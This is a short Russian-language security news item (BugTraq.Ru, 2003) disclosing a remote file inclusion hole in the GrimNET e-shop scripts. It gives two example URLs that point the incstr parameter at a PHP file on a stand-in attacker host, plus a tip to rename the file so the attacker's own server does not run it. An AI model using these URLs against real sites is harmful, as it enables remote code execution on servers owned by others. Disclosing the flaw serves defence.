BugTraq.Ru
Русский BugTraq
http://www.bugtraq.ru/rsn/archive/2003/10/37.html

Выполнение произвольного PHP-кода в GrimNET e-shop
dl // 20.10.03 22:37
Не представляю, насколько актуальна эта самая корейская система электронных магазинов, но дырка любопытна и сама по себе.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/37.html]

Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.

Источник: NivaX, http://www.web-hack.ru    
теги: .net  |  предложить новость  |  обсудить  |  все отзывы (0) [4119]
назад «  » вперед

аналогичные материалы
Взлом 180 тысяч ASP.Net сайтов через sql-инъекции // 21.10.11 00:22
Плагин MS ставил под удар пользователей FireFox // 17.10.09 01:57
Октябрьские обновления от MS // 14.10.09 00:19
Августовские обновления от MS // 11.08.09 22:40
Microsoft представила новый язык программирования // 11.05.09 21:10
Обход защиты памяти в Vista // 12.08.08 02:11
Эти страшные NULL-pointerы // 05.05.08 22:24
 
последние новости
Microsoft обещает радикально усилить безопасность Windows в следующем году // 19.11.24 17:09
Ядро Linux избавляется от российских мейнтейнеров // 23.10.24 23:10
20 лет Ubuntu // 20.10.24 19:11
Tailscale окончательно забанила российские адреса // 02.10.24 18:54
Прекращение работы антивируса Касперского в США // 30.09.24 17:30
Microsoft Authenticator теряет пользовательские аккаунты // 05.08.24 22:21
Облачнолазурное // 31.07.24 17:34





  Copyright © 2001-2024 Dmitry Leonov Design: Vadim Derkach